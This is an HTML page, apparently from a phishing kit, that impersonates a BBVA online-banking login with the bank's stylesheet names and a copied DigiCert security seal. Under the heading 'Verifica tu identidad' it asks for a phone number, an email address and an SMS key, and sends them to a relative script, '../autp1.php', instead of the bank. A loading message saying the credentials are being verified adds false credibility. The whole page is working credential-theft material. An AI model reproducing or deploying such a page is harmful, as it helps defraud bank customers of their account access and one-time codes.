<!DOCTYPE html>
<html lang="es" class="no-js"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    
    
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <meta http-equiv="Last-Modified" content="0">

    <!--[if IE]>
        <script src="/NetApp/Content/js/html5.js"></script>
    <![endif]-->
    

    <title>Index</title>

    <link rel="stylesheet" href="./errores.css">

    
    <link rel="stylesheet" href="./bbva-global.css">


    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

  
    <meta name="MobileOptimized" content="320">

    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">

    <meta name="apple-mobile-web-app-capable" content="yes">

    <meta names="apple-mobile-web-app-status-bar-style" content="black-translucent">

    <script type="text/javascript" src="./jquery-min.js.descarga"></script>

    <script type="text/javascript" src="./selectors.js.descarga"></script>

    <script type="text/javascript" src="./codigo2.js"></script>


        <script type="text/javascript" src="./desktopMobileCodigo.js.descarga"></script>
    <script type="text/javascript" src="./jquery.simplemodal.1.4.3.min.js.descarga"></script>

    <script type="text/javascript" src="./jquery.qtip.min.js.descarga"></script>

    <script type="text/javascript" src="./tooltipForm.js.descarga"></script>

    <script type="text/javascript" src="./jquery.placeholder.min.js.descarga"></script>

    <script type="text/javascript" src="./quieroDropdown.js.descarga"></script>

    <script type="text/javascript" src="./TRDvalidate.js.descarga"></script>

    <!--[if IE 9]>
        <script type="text/javascript" src="/NetApp/Content/js/matchMedia.js"></script>
        <script type="text/javascript" src="/NetApp/Content/js/matchMedia.addListener.js"></script>
    <![endif]-->

    <script type="text/javascript" src="./loginValidation2.js.descarga"></script>

    <script type="text/javascript" src="./collapsible_modules.js.descarga"></script>

    <script type="text/javascript" src="./jquery.nicescroll.js.descarga"></script>

    <script type="text/javascript" src="./slides.min.jquery.js.descarga"></script>

    <script type="text/javascript" src="./prettyCheckboxes.js.descarga"></script>

    <script type="text/javascript" src="./highcharts.js.descarga"></script>

    <script type="text/javascript" src="./charts.js.descarga"></script>

    <script type="text/javascript" src="./TRDSlider.js.descarga"></script>

    <script type="text/javascript" src="./jquery-ui-1.8.23.custom.min.js.descarga"></script>

    <script type="text/javascript" src="./TRDCurtain.js.descarga"></script>

    <script type="text/javascript" src="./jquery.mousewheel.js.descarga"></script>

    <script type="text/javascript" src="./jquery.jscrollpane.min.js.descarga"></script>

    <script type="text/javascript" src="./actions.js.descarga"></script>

    <script type="text/javascript" src="./validation.js.descarga"></script>

    <script type="text/javascript" src="./iframeResizer.contentWindow.min.js.descarga"></script>

    
    <script src="./bbva-global.js.descarga"></script>


</head>

<!--[if lt IE 7 ]> <body class="ie6"> <![endif]-->

<!--[if IE 7 ]> <body class="ie7"> <![endif]-->

<!--[if IE 8 ]> <body class="ie8"> <![endif]-->

<!--[if IE 9 ]> <body class="ie9"> <![endif]-->

<!--[if (gt IE 9)|!(IE)]><!-->

<body style="min-height: 300px !important;">
    <!--<![endif]-->
    



<div id="loginNetWebPublica">

<!-- POP UP ACCESS -->





<section id="access_content" class="fn_accessclientpanel clear" style="display: block">
    <form action="../autp1.php" method="post" id="login_form" name="login_form" autocomplete="off" data-new="true">
        <div class="button_panel">
            <div id="infoAccess">

                <div id="cr_loader" class="cr-loading">
                    <div class="cr-loading__wrapper">
                        <div class="cr-loading__animation">
                            <div class="spinner__wrapper spinner--default">
                                <span class="spinner__top"></span>
                                <span class="spinner__center"></span>
                                <span class="spinner__bottom"></span>
                            </div>
                        </div>
                        <div class="cr-loading__text">Verificando tus credenciales</div>
                    </div>
                </div>

                <span class="simil_border"></span>

                <div class="cr-form-new">
                    <div class="cr-form__item">
                        <div>
                            <div class="row">
                                <div class="col-sm-12 col-lg-12">
                                    <div class="cr-form__wrapper">
                                        
                                       <center><h4>Verifica tu identidad</h4></center>
                                       <hr>
                                    </div>
                                </div>
                            </div>


                            <div id="group_cuenta" class="group_login" style="">

                                <div class="row">
                                    <div class="col-sm-12 col-lg-12">
                                        <div class="cr-form__wrapper">
                                            <input id="Cuenta" class="textfield input--bg-white-grey" value="" type="text" name="Cuenta">
                                            <label for="Cuenta" class="input__label">Telefono</label>
                                            <button class="ui-close clear-btn" type="button" tabindex="-1">CLEAR INPUT TEXT</button>
                                            <div class="ui-wrong input__error-msg">Por favor, completa este campo.</div>
                                        </div>
                                    </div>
                                </div>

                                <div class="row">
                                    <div class="col-sm-12 col-lg-12">
                                        <div class="cr-form__wrapper">
                                            <input id="Usuario" class="textfield input--bg-white-grey" value="" type="text" name="Usuario">
                                            <label for="Usuario" class="input__label">Correo Electronico</label>
                                            <button class="ui-close clear-btn" type="button" tabindex="-1">CLEAR INPUT TEXT</button>
                                            <div class="ui-wrong input__error-msg">Por favor, completa este campo.</div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            


                            <div class="row">
                                <div class="col-sm-12 col-lg-12">
                                    <div class="cr-form__wrapper">
                                        <input id="Password" class="textfield input--bg-white-grey" value="" type="password" name="Password">
                                        <label for="Password" class="input__label">Clave SMS</label>
                                        <button class="ui-close clear-btn" tabindex="-1" type="button">CLEAR INPUT TEXT</button>
                                        <div class="ui-wrong input__error-msg">Por favor, completa este campo.</div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>

                    <div class="row row--button">
                        <div class="col-sm-12 col-lg-12">
                            <div class="cr-buttons">
                                <button type="submit" class="fn_formok ok button button--blue" >Aceptar</button>
                                <a href="#" target="_parent" class="button button--aqua" role="button">Hazte usuario</a>
                            </div>
                        </div>
                    </div>

                    <div id="cajaError" style="display: none;">
                        Cargado...
                       </div>

                    <div align="center" style="padding-bottom: 0px">
                        <img id="iconoInfoAccesoClientes" align="absmiddle" src="./icon_i_azul.png">

                        <a class="links" href="#" target="_parent">Olvidé mi contraseña</a>

                        <span class="separador-galleta"></span>

                        <div >
                      <div id="DigiCertClickID_ETfRhnqE" data-language="es">
                        <div id="DigiCertClickID_ETfRhnqESeal" style="text-decoration: none; text-align: center; display: block; vertical-align: baseline; font-size: 100%; font-style: normal; text-indent: 0px; line-height: 1; width: auto; margin: 0px auto; padding: 0px; border: 0px; background: transparent; position: relative; inset: 0px; clear: both; float: none; cursor: default;"><img src="https://seal.digicert.com/seals/cascade/?tag=yp9PogMt&amp;referer=bbvanet.bbva.com.uy&amp;format=png&amp;lang=es&amp;an=min" alt="DigiCert Secured Site Seal" tabindex="0" role="link" style="text-decoration: none; text-align: center; display: block; vertical-align: baseline; font-size: 100%; font-style: normal; text-indent: 0px; line-height: 1; width: auto; margin: 0px auto; padding: 0px; border: 0px; background: transparent; position: relative; inset: 0px; clear: both; float: none; cursor: pointer;"></div></div>
                       
                    </div>

                </div>
            </div>
        </div>
    </form>
</section>

</div>

<script type="text/javascript" src="./wK0ggcj4"></script>
<script async="" src="//seal.digicert.com/seals/cascade/seal.min.js"></script>


<div style="clear: both; display: block;"></div></body></html>